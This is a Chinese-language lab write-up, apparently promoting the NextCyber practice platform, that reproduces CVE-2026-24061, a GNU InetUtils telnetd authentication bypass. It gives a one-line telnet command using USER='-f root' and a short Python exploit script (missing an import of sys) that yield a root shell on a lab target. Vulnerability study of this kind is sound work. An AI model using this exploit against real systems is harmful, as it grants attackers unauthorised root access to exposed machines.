简介
CVE-2026-24061是GNU InetUtils中telnetd服务的一个认证绕过漏洞,允许攻击者无需任何凭证直接获取目标系统的root权限。该漏洞已于2026年初被公开披露,影响范围广泛,全球超过20万台设备暴露风险。
漏洞核心:攻击者通过Telnet连接时,可发送特制的USER环境变量值-f root,利用Linux登录程序的-f(跳过认证)参数,直接以root身份登录系统。
影响版本:GNU InetUtils 1.9.3至2.7版本均受影响
漏洞评级:CVSS评分9.8(严重级别)
环境搭建
首先我们打开NextCyber网络安全实战演练平台,在“课程中心”页面,选择“新的”标签筛选出新上课程,选择“inetutils”这个课程,免费解锁复现。
在课程的左边点击“跳转到问题”自动下拉到底部,点击右下角的“启动靶机实例”,开启靶机进行漏洞复现。
漏洞复现
靶机启动后,开放23端口,即telnet服务,我们使用nmap工具进行全端口扫描:
对服务进行-sV扫描,查看服务版本信息:
方法一
我们直接执行以下命令获取目标shell:
USER="-f root" telnet -a 10.22.39.203方法二
我们使用以下python脚本进行漏洞利用:
#!/usr/bin/env python3 import shutil import pexpect import argparse def check_telnet(): if not shutil.which("telnet"): print("[ERROR] telnet client not found. Please install 'telnet'.") sys.exit(1) def main(): check_telnet() parser = argparse.ArgumentParser(description="CVE-2026-24061 telnetd exploit interactive shell") parser.add_argument("-t", "--target", required=True, help="Target IP or hostname") parser.add_argument("-p", "--port", type=int, default=23, help="Telnet port") parser.add_argument("-T", "--timeout", type=int, default=10, help="Session timeout (seconds)") args = parser.parse_args() ip = args.target port = args.port timeout = args.timeout print(f"[+] Connecting to {ip}:{port}") try: child = pexpect.spawn(f"env USER='-f root' telnet -a {ip} {port}", timeout=timeout) child.interact() except Exception as e: print(f"[ERROR] {ip}:{port}: {e}") if __name__ == "__main__": main()可以看到,漏洞利用成功,能直接获取目标的root权限。
靶机体验
如果你也想体验这个漏洞的复现过程,欢迎登陆我们的 Nextcyber 网络安全实战演练平台,一键启动靶机,无需复杂环境搭建!随时随地进行靶机练习!
有学习需求或想获取更多资料的,欢迎站内私信交流!